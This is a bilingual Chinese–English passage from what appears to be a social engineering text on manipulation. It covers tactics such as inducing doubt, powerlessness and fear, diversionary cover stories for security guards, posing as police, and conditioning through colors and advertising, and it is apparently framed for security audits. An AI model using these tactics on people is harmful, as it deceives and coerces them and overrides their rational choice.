操纵有六种方式,无论是洗脑还是其他不那么阴险的方式,这些方式都是正确的。在我们深入讨论这一部分之前,我将快速介绍每一种方式。

Manipulation is used in six ways that hold true whether the topic is brainwashing or something less insidious. I will quickly go through each one before we get into this very deep section.

 
 
     
  • 增加目标的受暗示性。在最极端的情况下,睡眠或食物匮乏会增加目标的受暗示性。在较轻松的情况下,随着时间的推移,微妙的暗示会逐渐增强,使目标更容易受暗示。
  • Increasing the suggestibility of your target. At its most extreme, sleep or food deprivation increases a target’s suggestibility. On the lighter side, subtle hints that build in intensity over time to make your target more suggestible.
  •  
     
  • 控制目标环境。这种技术可以涉及方方面面,从控制目标可以访问的信息类型和数量,到更微妙的事情,例如访问目标的社交媒体网站。在社会工程学背景下,访问社交媒体可以让你查看目标的通信,并控制他收到的信息。
  • Gaining control over the target’s environment. This technique can involve everything from controlling the type and quantity of information to which a target has access to much subtler things like gaining access to a target’s social media websites. In a social engineering context, having access to social media allows you to view your target’s communications as well as exert control over the information he receives.
  •  
     
  • 制造怀疑。破坏和削弱目标的信仰体系可以在很大程度上操纵目标采取你想要的行动。从社会工程学的角度来看,这必须巧妙地进行。你不能直接闯入并开始贬低你的目标;相反,质疑他们遵守的规则、他们的工作或他们的信仰会影响目标做出理性决定的能力。
  • Creating doubt. Destabilizing and undermining your target’s belief system can go a long way toward manipulating your target to take an action you want. From a social engineering viewpoint, this must be done subtly. You can’t just barge in and start degrading your target; instead, questioning the rules they follow, their job, or their beliefs can affect the target’s ability to make rational decisions.
  •  
     
  • 制造无力感。这种真正恶毒的技巧在战时审讯中被使用,目的是让目标对自己的信念缺乏信心。社会工程师可以利用这种策略,通过展示你从权威人士那里得到的“事实”来剥夺目标的代理权,从而制造一种无力感。
  • Creating a sense of powerlessness. This truly malicious technique is used in wartime interrogations to make a target feel a lack of confidence in their convictions. A social engineer can utilize this tactic by taking away the target’s agency by presenting the “facts” you received from someone with authority, thus creating a powerless feeling.
  •  
     
  • 在目标中制造强烈的情绪反应。强烈的情绪反应包括怀疑、内疚、羞辱等。如果这种感觉足够强烈,它们可能会导致目标改变他们的整个信仰体系。社会工程师必须小心不要制造有害的负面情绪,但使用基于对损失或惩罚的恐惧而制造情绪反应的策略可能会对您的 SE 目标有益。
  • Creating strong emotional responses in the target. Strong emotional responses include everything from doubt to guilt to humiliation and more. If the feelings are intense enough, they can cause the target to alter their whole belief system. A social engineer must be careful not to create damaging negative emotions, but using tactics that create an emotional response based on fear of loss or punishment can prove beneficial to your SE goal.
  •  
     
  • 重度恐吓。对身体疼痛或其他可怕情况的恐惧可用于使目标在压力下崩溃。同样,大多数社会工程师不会走这条路,除非他们使用企业间谍作为策略,但在正常的社会工程中,这种策略利用感知到的权威来建立强烈的恐惧和潜在损失感。
  • Heavy intimidation. Fear of physical pain or other dire circumstances can be used to make a target crack under pressure. Again, most social engineers will not go this route unless they are using corporate espionage as a tactic, but in normal social engineering, this tactic utilizes perceived authority to build strong fear and feelings of potential loss.
  •  
 

但大多数时候,操纵并没有那么极端。从最基本的层面来说,想象一下你在一个拥挤的房间里,有人叫你的名字。你的反应是什么?通常是转过身或回答“是的?”你被操纵了,但不一定是一种坏事。

Most times, however, manipulation is not so extreme. On its very basic level, imagine you’re in a crowded room and someone calls out your name. What is your reaction? Usually it is to turn around or respond with a “Yes?” You have been manipulated, but not necessarily in a bad way.

 

从心理层面来看,被操纵的影响更为深远。注意前面的互动是如何发生的:你的大脑听到你的名字,然后你会自动形成一个答案(“是吗?”)。这个答案和你的声音反应之间的联系非常短暂。即使你没有做出任何声音反应,或者辱骂不是针对你个人的,如果有人问你一个问题,你的大脑也会形成一个答案。

On a psychological level, being manipulated is even more profound. Notice what happens to make that preceding interaction happen: Your brain hears your name, and you automatically formulate an answer (“Yes?”). The connection between that answer and your vocal response is very short. Even if you made no vocal response or if the name-calling is not targeted to you personally, if a question is asked your mind will formulate an answer.

 

只要靠近两个人交谈并偷听到一个问题,你的大脑就会形成一个答案。答案可以是你脑海中的图像或声音。如果目标偷听到两个人谈论某人的长相,他的大脑就会形成一幅心理画面。如果你听到两个人讲一个关于一只鸡过马路的笑话,你可能会想象这只鸡、那条路或整个场景。

Just being in close proximity of two people conversing and overhearing a question will cause your mind to formulate an answer. The answer can be an image or sound in your mind. If a target overhears two people talking about what someone looks like his mind will form a mental picture. If you hear two people telling a joke about a chicken crossing the road, you may picture the chicken, the road, or the whole scene.

 

这种操纵只是你能做的开始。另一种操纵策略是条件反射

This type of manipulation is just the beginning of what you can do. Another manipulation tactic is that of conditioning.

 

人们可以习惯性地将某些声音或动作与感觉和情绪联系起来。如果每次提到积极的事情时,人们都会听到笔的咔嗒声,那么经过很短的时间,目标人物就可以习惯性地将积极的感觉与这种声音联系起来。

People can be conditioned to connect certain sounds or actions with feelings and emotions. If every time something positive is mentioned a person hears a pen click, after a short time the target can be conditioned to associate a positive feeling with this sound.

 

最经典的条件反射例子之一是伊万·巴甫洛夫和我们称之为巴甫洛夫的狗,这在第 5 章中进行了讨论。那么问题就变成了你是否可以将这种条件反射应用到人身上。虽然让目标流口水并不是大多数社会工程师的首要任务(虽然这很有趣),但是否有办法让目标按照你希望的方式对某些输入做出反应?

One of the most classic examples of conditioning was Ivan Pavlov and what we call Pavlov’s dog, which was discussed in Chapter 5. The question then becomes whether you can use this type of conditioning on people. Although making targets salivate is not on most social engineers’ priority list (although it would be humorous), are there ways to condition a target to react to certain sets of input the way you want them to react?

 

要找到答案,请阅读以下部分,其中提供了一些商业和营销中操纵的例子,为讨论和分析如何在个人层面上使用操纵奠定了基础。

To find the answer, read the following sections, which provide a few examples of manipulation in business and marketing to set a foundation for discussion and an analysis of how to use manipulation on a personal level.

 

召回还是不召回

To Recall or Not To Recall

 

2010 年 5 月, 华盛顿邮报》报道了一个有趣的故事(www.washingtonpost.com/wp-dyn/content/article/2010/05/27/AR2010052705484.html)。儿童泰诺、Motrin、Benadryl 和 Zyrtec 等非处方液体药物的制造商发现一批 Motrin 存在缺陷,但因为成本太高而不愿召回。该公司的答案是什么?

In May 2010 The Washington Post reported an interesting story (www.washingtonpost.com/wp-dyn/content/article/2010/05/27/AR2010052705484.html). The maker of children’s Tylenol, Motrin, Benadryl, and Zyrtec, among other liquid over-the-counter medicines, discovered a defective batch of Motrin and didn’t want to perform a recall due to the costs of such an action. What was the company’s answer?

 

它使用了操纵手段。该公司雇佣了一大批承包商,逐家逐店地购买店内所有的 Motrin,然后销毁。不幸的是,当承包商在一家商店丢下一份文件,概述了这一阴谋时,它的计划被挫败了,随后该阴谋被报告给了美国联邦药物管理局 (FDA)。

It used manipulation. The company hired a slew of contractors to go from store to store and buy back all the Motrin in the store, which would then be destroyed. Unfortunately, its plans were foiled when a contractor dropped a paper in one store that outlined the plot, which was then reported to the Federal Drug Administration (FDA).

 

顺便提一下,FDA 确实要求该公司召回 1.36 亿瓶,这是四分之一的召回行动中的一次。不幸的是,为时已晚,因为据报道有 775 例儿童和婴儿对这批受污染的药物产生不良反应,其中 37 例死亡。这些报告并不能确定这些死亡是 Motrin 不良反应造成的,还是对 Motrin 的反应造成的。这不是本文的重点。

On a side note, the FDA did make that company recall 136 million bottles in just one out of four recalls. Unfortunately, it was too late because 775 cases were reported of children and infants who had adverse reactions to this tainted batch, with 37 ending in death. The reports are not conclusive whether the deaths were a result of the bad Motrin or a reaction to the Motrin. That is not the focus here.

 

这是一个非常黑暗的操纵例子,或者至少是试图操纵。为了保护这家公司的形象,它愿意放弃正确的程序和全世界儿童的安全。它试图操纵系统,在这个过程中人们失去了生命。商店里的文件讨论了承包商如何被命令回购产品,并且在任何时候都不能提到“召回”。

This is a very dark example of manipulation, or at least attempted manipulation. To protect this company’s image it was willing to forgo the proper procedures and the safety of children all over the world. It attempted to manipulate the system and in the process people lost their lives. The documentation that was dropped in the store discussed how the contractors were under orders to buy the product back and not mention “recall” at any point in time.

 

当该公司被发现时,它采取了许多有趣的操纵策略。它转移了注意力,声称采取这一行动的原因是其专家认为对儿童不存在重大风险。

When the company was caught it deployed many interesting manipulation tactics. It deflected the situation by saying the reason for the action was its experts didn’t think a significant risk existed to children.

 

随后,该公司正式道歉,并解雇了六名高管。然后真正的操纵开始了。在接受质询时,该公司表示,他们并不是在试图进行所谓的“虚假召回”。该公司正在通过承包商回购测试所谓受损批次。如果发现有问题,该公司会采取适当的程序。该公司试图使用一种名为“转移视线”的操纵技术,将注意力转移到他们真正所做的事情上,使事情看起来比实际情况更好。此外,它还使用掩盖手段来操纵那些不同意其行为的人的想法,他们发表声明称公司正在尝试进行测试以确定是否需要召回。

It followed this statement by a formal apology and the firing of six top executives. Then the real manipulation came in. While being questioned, the company stated that they were not trying to do a “phantom recall,” as it was being called. The company was testing the alleged damaged batch by having the contractors buy it back to be tested. If it was found faulty the company would have taken the proper procedures. This company attempted to use a manipulation technique called diversion, to divert attention from what they were really doing to make it seem better than it was. In addition, it used a cover-up technique to manipulate the thinking of those who disagreed with their actions by issuing statements that the company was trying to do testing to determine if there was need for a recall.

 

这种操纵值得讨论,因为转移注意力的策略在个人场合也能以小规模发挥作用。如果你被困在不该去的地方,那么编一个可信的好故事可以在很大程度上操纵目标,让你安全通过。将目标的注意力转移到手头问题以外的其他事情上,可以给你足够的时间来转移他或她的注意力。例如,如果你被保安抓住,你不必紧张,只需看着他说:“你知道我在这里做什么吗?你听说一些装有重要数据的 USB 钥匙丢了吗?我们必须在明天所有人进来之前找到它们。你想检查一下卫生间吗?”

This type of manipulation is worth discussing because a diversion tactic can work on a much smaller scale in a personal setting, too. If you are caught in an area or place you should not be, then having a good cover story that is believable can go a long way toward manipulating the target to allow you safe passage. Diverting the target’s attention to something other than the problem at hand can give you enough time to redirect his or her concern. For example, if you are caught by a security guard, instead of getting nervous, you could simply look at him and say, “Do you know what I am doing here? Did you hear that some USB keys have been lost with very important data on them? It is imperative we find them before everyone comes in tomorrow. Do you want to check the bathrooms?”

 

你们中的许多人可能从未听说过 Motrin 召回事件,这表明该公司在操纵媒体和司法系统方面做得很好(到目前为止),以使此事不被公众关注。无论如何,这种情况概述了转移注意力和掩盖真相如何被用于操纵。

Many of you probably never heard about the Motrin recall story, showing that the company did a good job of manipulating (so far) the media and justice system to keep the limelight off of it. Regardless, this situation outlines how diversion and cover-up can be used in manipulation.

 

焦虑终于被治愈了

Anxiety Cured at Last

 

1998 年,全球最大的制药公司之一史克必成发起了一场广告宣传活动,旨在“教育”大众了解所谓的“社交焦虑症”。该公司在 50 篇新闻报道和调查中提出了诸如“您患有社交焦虑症吗?”之类的问题。这些测验和调查旨在“教育”人们了解这种疾病以及如何判断自己是否患有这种疾病。

In 1998 SmithKline Beecham, one the largest pharmaceutical companies in the world, launched an ad campaign designed to “educate” the masses about something it called “social anxiety disorder.” It planted 50 press stories and surveys with questions like, “Do you have social anxiety disorder?” These quizzes and surveys were geared to “educate” people on this disorder and how to tell whether they suffer from it.

 

同年晚些时候,该公司将医学期刊上的营销活动文案从“帕罗西汀意味着和平……针对抑郁症、恐慌症和强迫症”改为“向他们展示他们可以……这是第一个也是唯一一个获批的社交焦虑症治疗方法。”这一变化花费了公司约 100 万美元。

Later that year it changed its marketing campaign copy in medical journals from “Paxil means peace…in depression, panic disorder, and OCD” to “Show them they can…the first and only approved treatment for social anxiety disorder.” This change cost the company about $1 million to make.

 

1999 年,史克必成在平面和电视上发起了一项耗资 3000 万美元的宣传活动,宣布该公司找到了治疗社交焦虑症的方法,名为 Paxil。该公司利用调查和测验的数据,购买了当时一些“最热门”电视节目的广告位,并大肆宣扬 1000 万美国人患有 SAD(社交焦虑症)的统计数据,现在终于有了希望。

In 1999, a $30 million campaign was launched on print and television announcing that SmithKline Beecham found the cure for social anxiety disorder, and its name is Paxil. Using the data from the surveys and quizzes the company bought spots in some of the “hottest” television shows at that time and spouted statistics that 10 million Americans suffer from SAD (social anxiety disorder), and now there is hope.

 

到了 2000 年,帕罗西汀的销售额占到了整个市场增长的一半:该公司“在 2000 年成为美国选择性血清素再摄取抑制剂市场新零售处方药的头号人物”。2001 年,该公司获得 FDA 批准,将帕罗西汀用于治疗广泛性焦虑症和创伤后应激障碍。

By 2000, Paxil sales accounted for half of the increase in the entire market: The company “became number one in the U.S. selective serotonin reuptake inhibitor market for new retail prescriptions in 2000.’’ In 2001 it won FDA approval to market Paxil for both generalized anxiety disorder and posttraumatic stress disorder.

 

9/11 袭击导致所有抗抑郁药和抗焦虑药的处方量急剧增加。在此期间,帕罗西汀的广告将其定位为许多人在袭击后无法控制的恐惧和无助感的解决方案。

The 9/11 attacks resulted in a dramatic increase in prescriptions for all antidepressants and anxiety drugs. During this time Paxil’s advertising positioned it as an answer to the uncontrollable feelings of fear and helplessness that many people felt in the aftermath of the attacks.

 

我并不是说这些药物没有效果,或者该公司的动机是恶意的,但我发现这个案例特别有趣,因为市场操纵始于教育,最终导致销售额大幅增长,同时又在此过程中造成了新的混乱。

I am not saying that these drugs do not work, or that the company’s motive is malicious, but I find this case particularly interesting in that the manipulation of the market started with education and ended with a massive increase in sales, while creating new disorders along the way.

 

这种类型的案例构建操纵通常用于营销,但也用于政治,甚至个人层面,提出一个可怕的问题,然后展示你得出的“事实”来证明你所说的是真的。在《真正的骗局》的一集中,保罗·威尔逊设置了一个场景,他必须救出一位著名明星,他们利用这位明星来骗取商店的一些 CD。店员扣留了这位明星,等待警察到来。保罗走进来,表明自己是警察,亮出他的钱包,里面只有他孩子的照片,然后“逮捕”了这位明星,拿走了 CD 和收银机里的钱作为证据,没有盘问就离开了。这个故事是这种案例构建操纵的一个很好的例子。保罗遇到了一个问题(偷窃的明星),并将自己展现为问题的解决方案(警察)。无论是什么情况,在提出请求之前,你要先证明自己是一个好人,这样对方才能更容易接受你的请求。

This type of case-building manipulation is often used in marketing, but is also used in politics and even on a personal level, presenting a problem that is terrible, but then presenting “facts” that you have derived as proof of why what you say is true. On one episode of The Real Hustle, Paul Wilson set up a scenario where he had to extract a famous star they were using in a scam to steal some CDs from a store. The store clerk detained the star and waited for the cops to arrive. Paul walked in, identified himself as a cop, flashed his wallet with nothing more than a picture of his kids in it, and was able to “arrest” the star, take the CDs and the money in the cash register as evidence, and leave unquestioned. This story is an excellent example of this type of case-building manipulation. Paul had a problem (the thieving star) and presented himself as the solution (the cop) to the problem. Whatever the scenario, build the case for what a good person you are before presenting your request, and that case makes the request more palatable to the person you’re trying to manipulate.

 

你不能强迫我买那个!

You Can’t Make Me Buy That!

 

凯马特。我觉得这部分就到此为止了,但我觉得我应该再解释一下。凯马特开发了一个名为规划图的理念,这是一种图表,向零售商展示如何根据颜色、尺寸和其他标准展示他们的产品,以操纵他们的客户购买和消费。

Kmart. I felt like just leaving this section at that, but I think I should explain more. Kmart developed an idea it called the planogram, which is a diagram that shows retailers how to display their products based on colors, sizes, and other criteria to manipulate their customers to want to buy and spend the most.

 

规划图旨在创造最佳的视觉和商业产品展示。

Planograms are designed to create optimal visual and commercial product placement.

 

这些规划图的使用是一种操纵形式,因为研究人员研究了人们如何购物、思考和购买。了解这些有助于他们开发控制视觉输入的机制,以增加购物者的购买欲望。

The use of these planograms is a form of manipulation because researchers have studied how people shop, think, and buy. Understanding these things helped them develop mechanisms to control the visual input to increase shoppers’ desire to buy.

 

软件以及整个公司都致力于规划和执行这些规划图,以最大限度地留住购物者。

Software, as well as whole companies, are devoted to planning and executing these planograms for the maximum effect on keeping shoppers shopping.

 

采用三种不同的布局来操纵购物者:

Three different layouts are used to manipulate shoppers:

 
 
     
  • 水平摆放:为了增加顾客对某一商品的注意力,会采用并排摆放多个产品的水平方式。一些零售商发现,单个产品的摆放距离至少应在 15 至 30 厘米之间,才能提高顾客的注意力(见图6-8)。
  • Horizontal product placement: To increase a customer’s concentration on a certain article, a multiple horizontal placement side by side of one product is applied. Some retailers found that a minimum placement range between 15 and 30 cm of a single product is necessary to achieve an increase in customer attentiveness (see Figure 6-8).
  •  
     
  • 垂直产品摆放:另一种方法是垂直产品摆放。这种摆放方式将一个产品摆放在多个货架层上,以获得 15–30 厘米的摆放空间(见图6-9)。
  • Vertical product placement: A different method used is the vertical product placement. Here one product is placed on more than one shelf level to achieve 15–30 cm placement space (see Figure 6-9).
  •  
 

图 6-8:将相同或相似的物品放在水平行中,如计算机生成的规划图所示,可以增加顾客的关注度。

Figure 6-8: Placing the same or similar items in a horizontal row, as shown in this computer generated planogram, increases customer focus.

 
f0608.tif
 

图 6-9:将产品组合在一起以吸引人们的注意力到他们想要销售的商品上。

Figure 6-9: Products are grouped together to drawn the eye to items they want to sell.

 
f0609.tif
 
 
     
  • 区块摆放:将具有共同点的产品放在一个区块(品牌)中。可以并排摆放、堆叠摆放、居中摆放或使用磁化挂钩摆放(见图6-10)。
  • Block placement: Products that have something in common are placed in a block (brands). This can be done side by side, on top of each other, centered, or using magnetized hangers (see Figure 6-10).
  •  
 

图 6-10:同时使用几种不同类型的规划图的另一个示例。

Figure 6-10:Another example of a few different types of planograms being used at once.

 
f0610.tif
 

货架陈列图并不是操纵购物者的唯一方法。一项测试涉及一家购物中心播放专门设计的音乐循环。结果是,这些购物者在商场停留的时间比没有播放音乐时平均长 18%。

Planograms are not the only method of manipulating shoppers. One test done involved a shopping mall running specifically designed music loops. The result was that those shoppers stayed in the mall an average of 18% longer than when the music was not running.

 

《商业研究杂志》上,Jean-Charles Chebat 和 Richard Michon 发表了他们在加拿大一家购物中心进行的一项研究(www.ryerson.ca/~rmichon/Publications/Ambient%20odors.pdf)。研究人员将特制的香味喷入空气中,以激发快乐和购买欲望。结果,在为期一周的研究中,每位购物者平均多消费了 50 美元。

In the Journal of Business Research, Jean-Charles Chebat and Richard Michon published a study they performed in a Canadian shopping mall (www.ryerson.ca/~rmichon/Publications/Ambient%20odors.pdf). The researchers pumped specially designed aromas into the air that were supposed to trigger happiness and the desire to buy. The result there was that an average of $50 more per shopper was spent in that week-long study.

 

现在,你去商场和杂货店的旅程将不再一样。但是,你可以从这些方法和实验中学到很多东西。了解人们如何在大脑中对事物进行分组可以影响你如何组织货架,以操纵目标的感受、情绪和想法。

Your trips to the shopping malls and grocery stores will never be the same now. However, you can learn a lot from these methods and experiments. Knowing how people group things in their brains can affect how you organize your shelves to manipulate the feelings, emotions, and thoughts of your targets.

 

说到颜色,它们是操纵目标情绪的主要方式。许多相同的原则也适用于颜色,就像它们适用于产品植入一样。你选择穿或使用的颜色会影响目标。人们对颜色及其影响进行了大量研究。以下是特定颜色可能影响他人思维或情绪的一些方式的简短列表:

On the topic of colors, they are a major way to manipulate the emotions of a target. Many of the same principles apply to colors as they do to product placement. The colors you choose to wear or use can affect the target. A lot of research has been done on colors and their effects. The following is a short list of some ways a particular color could affect the thinking or emotions of another person:

 
 
     
  • 白色:白色通常与纯洁、光明和洁净联系在一起。它给人安全和中立的感觉,也给人善良和信仰的感觉。这就是为什么白色经常用于婚礼或作为屈服的颜色。
  • White: White is often associated with purity, light, and cleanliness. It gives feelings of safety and neutrality as well as goodness and faith. This is why white is often used in weddings or as the color of surrender.
  •  
     
  • 黑色:黑色通常代表权力、优雅、神秘和力量。它用于表示权威、深度和稳定。黑色给人一种平静和安宁的感觉。由于它与其他颜色形成对比,因此它也可以用来增强其他颜色。
  • Black: Black often denotes power, elegance, mystery, and strength. It is used to denote authority, depth, and stability. Black gives the feeling of calmness and tranquility. Because it contrasts with other colors, it can also be used to enhance other colors.
  •  
     
  • 红色:红色与兴奋和喜悦有关。它是一种充满庆祝、行动和活力的颜色。它可以表示健康、速度、激情、欲望和爱。红色可以刺激情绪,并增加心率、呼吸和血压。
  • Red: Red is associated with excitement and joy. It is a color filled with celebration, action, and energy. It can denote good health, speed, passion, desire, and love. Red can stimulate emotions as well as increase heart rate, respiration, and blood pressure.
  •  
 

红色会引发强烈的情绪——使用红色时要小心。尽管它可以表示权力和冲动,但它也可以表示武力、恐吓和征服,甚至暴力和报复。使用红色时要小心。
 
     
  • 橙色:橙色给人温暖、热情、吸引力、决心、力量和耐力的感觉。它能让人感到精力充沛,甚至刺激食欲。
  •  
 

Red can trigger strong emotions—use caution when using red. Even though it can denote power and impulsiveness, it can denote force, intimidation, and conquest, even violence and revenge. Be careful how you use red.
 
     
  • Orange: Orange gives warmth, enthusiasm, attraction, determination, strength, and endurance. It can stimulate a person to feel invigorated and even stimulate his or her appetite.
  •  
 

 

橙色是另一种需要谨慎使用的颜色。虽然使用橙色有很多好处,比如让观众感到温暖并被您或您的产品所吸引,但过多或错误的组合会让人产生不安全感、无知感和懒惰感。
 
     
  • 金色:金色通常与光明、智慧、财富和威望相关。
  •  
     
  • 黄色:黄色与活力和乐观、喜悦和愉快、忠诚和清新有关。它能让人感到专注和细心。
  •  
 

Orange is another color to be cautious with. Although using orange has many good benefits, like making the viewer feel warm and attracted to you or your product, too much or the wrong combination can create feelings of insecurity, ignorance, and sluggishness.
 
     
  • Gold: Gold is usually associated with illumination, wisdom, wealth, and prestige.
  •  
     
  • Yellow: Yellow is associated with energy and optimism, joy and cheerfulness, loyalty and freshness. It can cause a person to feel focused and attentive.
  •  
 

 

黄色也会影响人的记忆力(为什么很多便签都是黄色的?)。少量使用黄色可以引发积极情绪,但过多则会导致目标失去注意力或感到受到批评。
 
     
  • 绿色:绿色通常与自然、和谐、生命、生育、野心、保护和和平有关。它可以产生非常镇静的效果,让人感到安全。
  •  
 

Yellow also has an impact on a person’s memory (why are so many sticky notes yellow?). Used in small amounts, it can trigger positive emotions, but too much can cause a target to lose focus or feel criticized.
 
     
  • Green: Green is often associated with nature, harmony, life, fertility, ambition, protection, and peace. It can produce a very calming effect, making someone feel safe.
  •  
 

 

绿色是另一种强大的颜色,但如果在错误的环境中使用或使用过多,也会让人感到贪婪、内疚、嫉妒和混乱。
 
     
  • 蓝色:蓝色与天空和海洋的颜色有关。它可以与智慧、直觉、真理、宁静、健康、力量和知识联系起来。它非常镇静和凉爽,并且已知可以减缓新陈代谢。
  •  
 

Green is another power color but can also make one feel greedy, guilty, jealousy, and disordered if used in the wrong setting or used too much.
 
     
  • Blue: Blue is associated with the color of the sky and ocean. It can be linked to intelligence, intuition, truth, tranquility, health, power, and knowledge. It is very calming and cooling and has been known to slow down the metabolism.
  •  
 

 

蓝色是最容易引起眼睛聚焦的颜色。它可以带来许多积极的影响,但要注意不要让目标感到寒冷或沮丧。
 
     
  • 紫色:紫色与皇室、贵族、奢华、创造力和神秘有关。
  •  
     
  • 棕色:棕色与大地、可靠性、亲和力、传统和秩序有关。它可以创造扎根或联系的情感,或具有秩序感。
  •  
 

Blue is the easiest color for the eyes to focus on. It can have many positive effects, but be careful not to make the target feel cold or depressed.
 
     
  • Purple: Purple is associated with royalty, nobility, luxury, creativity, and mystery.
  •  
     
  • Brown: Brown is associated with earth, reliability, approachability, convention, and order. It can create emotions of being rooted or connected, or having a sense of order.
  •  
 

 

如何使用这些信息?我并不是说,只要穿一件简单的蓝色衣服,就能让某人平静地把密码交给你。但你可以利用这些信息来规划攻击方式,确保你有最大的成功机会,这包括你的外表和着装。

How can you use all this information? I am not suggesting that with a simple blue outfit you can make someone feel calm enough to hand you her password. Yet you can use this information to plan your attack vectors, ensuring you have the best opportunity to succeed, which includes how you look and how you are dressed.

 

社会工程师需要分析他们要拜访的目标,确保他们选择穿的颜色能够增强他们操纵目标的能力,而不会让他们反感。例如,知道绿色可能会引起贪婪或野心的感觉可以帮助社会工程师决定不要穿绿色参加慈善机构的会议,因为这可能会引起与慈善机构的使命相反的感觉和情绪。另一方面,穿着蓝色的衣服去律师办公室可以起到镇静作用,让律师更加坦诚。仔细规划和合理使用这些策略可以帮助确保你的社会工程审计取得成功。

A social engineer would want to analyze the target they will be calling on and make sure the colors they choose to wear augment their ability to manipulate the target and not turn them off. For example, knowing that green may elicit feelings of greed or ambition can help a social engineer decide not to wear green to a meeting with a charity where it might conjure feelings and emotions contrary to the charity’s mission. Wearing something blue to a lawyer’s office, on the other hand, can have a calming effect, allowing the lawyer to open up more. Careful planning and sensible use of these tactics can help ensure the success of your social engineering audits.

 

调理目标积极响应

Conditioning Targets to Respond Positively

 

条件反射在一切事物中都有应用,从正常对话到营销再到恶意操纵。就像巴甫洛夫的狗一样,人们已经习惯对某些事物做出反应。人性常常被用来操纵大多数人采取操纵者想要的行动。

Conditioning is used in everything from normal conversation to marketing to malicious manipulation. Just like Pavlov’s dog, people have been conditioned to respond to certain items. Human nature is often used to manipulate the majority of people to take actions the manipulators want.

 

大多数人想到婴儿时都会微笑,我们会觉得会说话的动物很“可爱”,我们甚至可能会在脑海里唱出一种流行产品的广告歌。

When the majority of people think of babies they will smile, we will find talking animals “cute,” and we might even be manipulated to sing a jingle for a popular product in our head.

 

这些手段非常隐蔽,很多时候我们甚至不知道它们在起作用。很多时候,我发现自己在想,衣着暴露、穿着比基尼的女人和啤酒有什么关系。

These tactics are so covert that many times we don’t even know they are working. Many times I find myself wondering what a scantily clad, bikini-wearing woman has to do with beer.

 

米其林轮胎就是一个运用条件反射的例子(见图6-11)。多年来,这家公司一直在其广告中使用婴儿。为什么?“因为轮胎承载着太多东西。”但这些广告的意义远不止于此。你看到婴儿,会微笑,会感到快乐。这种情绪会引发积极的反应,而这种反应会使你同意接下来要说的话。当你看到婴儿时,你会微笑;当你看到婴儿很多次时,你就会习惯性地想到米其林轮胎时产生的温暖、快乐的感觉。

One example of how conditioning is used is Michelin Tires (see Figure 6-11). For years this company has used babies in its ads. Why? “Because so much is riding on your tires.” But these ads have more to them. You see a baby, you smile, and you are happy. That emotion triggers a positive response, and that response conditions you to be agreeable to what is told to you next. When you see the baby you smile; when you see it enough you are conditioned to think of warm, happy feelings when you see Michelin tires.

 

图 6-11:婴儿不是很可爱吗?

Figure 6-11: Aren’t babies cute?

 
f0611.tif
 

看到轮胎旁边的婴儿会让你将积极快乐的情绪与该品牌联系起来。这是经典操纵的一个例子。

Seeing the baby next to the tire makes you equate positive happy feelings with that brand. This is an example of classic manipulation.

 

另一个百威广告(见图6-12)可能让很多人感到疑惑——还记得那些打嗝出“Bud”、“weis”和“er”的青蛙吗?青蛙和啤酒有什么关系?同样的,想想最近的克莱兹代尔马和他的动物朋友团伙。这些广告很吸引人,第一次看到甚至很有趣,但并没有真正解释你为什么要买他们的啤酒。

Another advertisement (see Figure 6-12) that might have had many people wondering from Budweiser—remember those popular frogs belching out “Bud” “weis” and “er”? What do frogs have to do with beer? Along those same lines, think of the more recent Clydesdale horse and his gang of animal friends. These ads are catchy, even funny the first time, but not really explaining why you want to buy their beer.

 

图 6-12:卖啤酒的青蛙。

Figure 6-12: Frogs selling lager.

 
f0612.tif
 

这种操纵和条件反射的形式非常微妙。你对那个广告大笑,然后你开车来到当地的啤酒经销商处,看到青蛙或马的纸板剪影,不禁会心一笑,这会产生一种积极的感觉,让你愿意购买该产品。

This form of manipulation, conditioning, is subtle. You laugh at that commercial, and then later on you pull into your local beer distributor, see a cardboard cutout of the frogs or horse, and smile to yourself, which creates that positive feeling that makes you feel agreeable to buying the product.

 

这些条件反射策略经常用于销售和营销公司,目的是操纵消费者购买他们的产品而不是竞争对手的产品。社交工程师实际上并不是在销售产品,但他们确实希望他们的目标“购买”他们销售的产品、他们摆出的借口以及他们希望目标采取的行动。但为什么要使用操纵?利用这种强大的控制形式的动机是什么?下一节将介绍这个主题。

These conditioning tactics are used often in the world of sales and marketing firms with the goal of manipulating the consumer to buy their products over the competition. Social engineers aren’t really selling a product, but they do want their targets to “buy” the lines they are selling, the pretext they are putting out there, and the actions they want the target to take. But why use manipulation? What are the incentives to utilizing this powerful form of control? The next section covers that very topic.

 

操纵激励

Manipulation Incentives

 

操纵某人的动机是什么?这个问题涉及到操纵中使用的方法、思维和策略的根源。并非所有操纵都是负面的,但都与其背后的动机有关。但每种动机都可能是积极的,也可能是消极的。

What are the incentives to manipulate someone? This question gets to the root of the methods, thinking, and tactics used in any manipulation. Not all manipulation is negative, but is related to the incentives behind it. But each incentive can be positive or negative.

 

什么是激励?激励可以是任何激励你采取行动的事物。它可以是金钱、爱、成功或任何东西——甚至是仇恨、嫉妒和羡慕等负面情绪。

What is an incentive? An incentive can be labeled as anything that motivates you to take an action. It can be money, love, success, or anything—even negative emotions like hatred, jealousy, and envy.

 

人们选择操纵他人的主要原因可以分为三类:经济、社会和意识形态动机。以下部分将介绍每种动机以及它们如何应用于操纵。

The main reasons why people chose to manipulate others can be broken down into three categories: financial, social, and ideological incentives. The following sections look at each of these incentives and how they apply to manipulation.

 

财政奖励

Financial Incentives

 

最常见的是金钱诱因,就像前面提到的与增加销售额有关的案例一样。许多骗局的手段背后都有金钱诱因。

Financial incentives tend to be the most common, as in the cases mentioned earlier related to increasing sales. Many scams have a financial incentive behind their tactics.

 

每天有多少人都希望中奖?他们可能花费数百美元,但中了 20 美元的奖金额就让他们很开心,并让他们不断回来买更多。

How many people play the lottery every day with the hopes of getting that winning ticket? They may spend hundreds of dollars over time, and winning a $20 payoff makes them happy and keeps them coming back for more.

 

一个非恶意的财务激励例子是优惠券。如果你在这家商店购买这种特定产品,你将获得 X 美元或美分的折扣。如果你是一个节俭的购物者或想尝试该产品,你会去那家商店。

A non-malicious example of financial incentive is coupons. If you buy this particular product at this particular store you will get X dollars or cents off. If you are a thrifty shopper or want to try that product you will go to that store.

 

许多宣传提高你的教育、职业或技能的商业广告都利用了财务激励手段,声称你完成课程或教育后收入会增加。

Many commercials that promote furthering your education, career, or skill set use financial incentives by painting a picture that your income will increase after their course or education.

 

恶意攻击者使用操纵手段的动机是他自己的经济利益,因此他的动机和技术将反映这一点。例如,如果恶意社会工程师的目标是让目标放弃他辛苦赚来的一些钱,社会工程师将利用“允许”索要钱财的借口——慈善组织这样的借口在这种情况下是合适的,因为索要捐款或财务信息并不罕见。

